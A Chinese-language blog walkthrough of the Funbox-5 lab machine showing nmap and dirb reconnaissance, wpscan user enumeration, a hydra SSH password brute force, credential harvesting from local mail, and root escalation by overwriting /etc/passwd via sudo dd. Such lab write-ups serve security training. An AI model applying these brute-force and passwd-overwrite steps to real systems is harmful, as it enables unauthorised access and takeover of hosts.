FUNBOX-5: NEXT LEVEL

臭nana發表於2020-12-02

1、找到靶機ip:192.168.75.10

nmap -sn 192.168.75.0/24

2、掃描靶機埠

root@chounana:~# nmap -p- -A 192.168.75.10
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.75.10
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:ae:39:e2:da:bb:6f:1a:6b:04:ec:36:29:d9:0c:ea (RSA)
|   256 1d:d7:ef:2c:85:bf:0d:fc:e2:60:85:22:42:8d:cc:4d (ECDSA)
|_  256 a0:a4:6d:d9:ca:3e:71:a1:31:ea:a2:7e:42:63:13:74 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:4D:A4:E9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.75.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.00 seconds

3、訪問80埠是預設的apache頁面,手動嘗試了一下robots.txt檔案,發現一個,但是試了發現沒有,想到下載頁面的提示,這裡就沒有深究

4、掃描網站目錄,這裡推薦直接使用dirb掃描,因為它會自動往下級目錄掃描,比較快,掃到一個drupal目錄,如果根據第一印象,這應該是drupal cms,所以是去訪問然後檢視它是哪個版本的,然後利用相關exploit指令碼攻擊,但是這裡不能訪問,會被重定向到192.168.178.33,這是訪問不到的,這個也能聯想到前面的提示

dirb http://192.168.75.10

但是dirb繼續在這個目錄下探測卻發現了不一樣的東西,就是有wp網站的特徵目錄

在之前的目錄下拼上index.php發現是可以訪問的,還有wp-content目錄也是可以訪問的,那麼接下來就直接上神器wpscan掃描使用者,至於wpscan的用法我前面有一篇文章講過,這裡不做贅述,這裡掃描的時候需要指定wp-content的目錄

wpscan --url http://192.168.75.10/drupal/index.php --wp-content-dir=http://192.168.75.10/drupal/wp-content --api-token=[你自己的] --enumerate u,p

發現有兩個使用者,admin和ben,由於wp-admin不能訪問,所以嘗試直接使用ben使用者爆破ssh登入

5、爆破出使用者ben的密碼為pookie

hydra -l ben -P /usr/share/wordlists/rockyou.txt ssh://192.168.75.10

ssh登入上去

root@chounana:~# ssh ben@192.168.75.10
ben@192.168.75.10's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

0 packages can be updated.
0 updates are security updates.

New release '18.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


You have mail.
ben@funbox5:~$ 

嘗試一些常規的手段收集一些資訊,沒有什麼能提權的檔案,在home目錄下有另外兩個使用者資料夾,但是都沒有許可權訪問

前面登入進來的時候提示有郵件,id檢視一下使用者組,發現ben屬於mail組,但是不能直接使用mail命令進行檢視,使用命令檢視後臺監聽埠,發現110埠,就是郵件埠

ben@funbox5:~$ mail
-bash: /usr/bin/mail: Permission denied
ben@funbox5:~$ id
uid=1001(ben) gid=1001(ben) groups=1001(ben),8(mail)
ben@funbox5:~$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.75.10:22        192.168.75.6:57120      ESTABLISHED -               
tcp        0      0 192.168.75.10:22        192.168.75.6:57118      ESTABLISHED -               
tcp        0      0 192.168.75.10:22        192.168.75.6:58214      ESTABLISHED -               
tcp6       0      0 :::110                  :::*                    LISTEN      -               
tcp6       0      0 :::143                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
ben@funbox5:~$ 

使用telnet命令連線到本地的110埠,使用ben的使用者名稱和密碼進行登入,使用list指令列舉郵件,發現有三封,使用retr命令檢視內容,在第三封發現有用資訊,得到adam的使用者名稱和密碼

6、切換到adam使用者,使用sudo -l命令發現可以使用root身份執行dd命令,可以使用這個命令來修改/etc/passwd檔案,從而修改root密碼來提權

先使用dd命令將/etc/passwd複製到當前資料夾,由於adam使用者沒有修改許可權,所以將其下載到本地,生成一個以root為密碼的密文,然後使用root身份進行修改,然後在傳送到靶機上,然後再通過dd命令將修改過後的passwd複製到/etc/目錄下,從而覆蓋之前的檔案,達到修改目的,最終拿到flag

adam@funbox5:~$ sudo dd if=/etc/passwd of=./passwd
3+1 records in
3+1 records out
2020 bytes (2.0 kB, 2.0 KiB) copied, 0.000882335 s, 2.3 MB/s
adam@funbox5:~$ ls -l
total 4
-rw-r--r-- 1 root root 2020 Dec  1 09:42 passwd
adam@funbox5:~$ sudo dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000988471 s, 2.1 MB/s
adam@funbox5:~$ 
root@chounana:~# scp adam@192.168.75.10:/home/adam/passwd ./
adam@192.168.75.10's password: 
passwd                                   100% 2020   608.4KB/s   00:00    
root@chounana:~# mkpasswd -m sha-512 root
$6$ImAMkOwZsS5l0HWf$89q5Yu10SuCABYJAIfEGTadihE/z3qCWwKK.DWEv8yaK7vfPEGOjQEWJMAD7M.IVEsS0urAvoKWq.kpe7N1Tu/
root@chounana:~# gedit passwd 

(gedit:2121): Gtk-WARNING **: 16:48:24.742: Calling org.xfce.Session.Manager.Inhibit failed: GDBus.Error:org.freedesktop.DBus.Error.UnknownMethod: No such method “Inhibit”
root@chounana:~# cat passwd 
root:$6$TOGT8tMexiscr/d6$IQ7akQ46BDvaChD5KPIiJo0MGn312E4s6SzEemahMjw78urvkyND5pkKtpAssgmS0whoXRsBanYrwhvT4RqXH1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
root@chounana:~# 
root@chounana:~# scp passwd adam@192.168.75.10:/tmp/passwd 
adam@192.168.75.10's password: 
Connection closed by 192.168.75.10 port 22
lost connection
root@chounana:~# scp passwd adam@192.168.75.10:/tmp/passwd 
adam@192.168.75.10's password: 
passwd                                   100% 2125     2.1MB/s   00:00    
adam@funbox5:~$ sudo dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000988471 s, 2.1 MB/s
adam@funbox5:~$ su - root
Password: 
root@funbox5:~# ls
flag.txt
root@funbox5:~# cat flag.txt 
 _______           _                     ______                      _                       _ 
(_______)         | |                   |  ___ \             _      | |                     | |
 _____ _   _ ____ | | _   ___ _   _ _   | |   | | ____ _   _| |_    | |      ____ _   _ ____| |
|  ___) | | |  _ \| || \ / _ ( \ / |_)  | |   | |/ _  | \ / )  _)   | |     / _  ) | | / _  ) |
| |   | |_| | | | | |_) ) |_| ) X ( _   | |   | ( (/ / ) X (| |__   | |____( (/ / \ V ( (/ /| |
|_|    \____|_| |_|____/ \___(_/ \_|_)  |_|   |_|\____|_/ \_)\___)  |_______)____) \_/ \____)_|

Made with ❤ by @0815R2d2
Please, tweet me a screenshot on Twitter.
THX 4 playing this Funbox.
root@funbox5:~# 

 

相關文章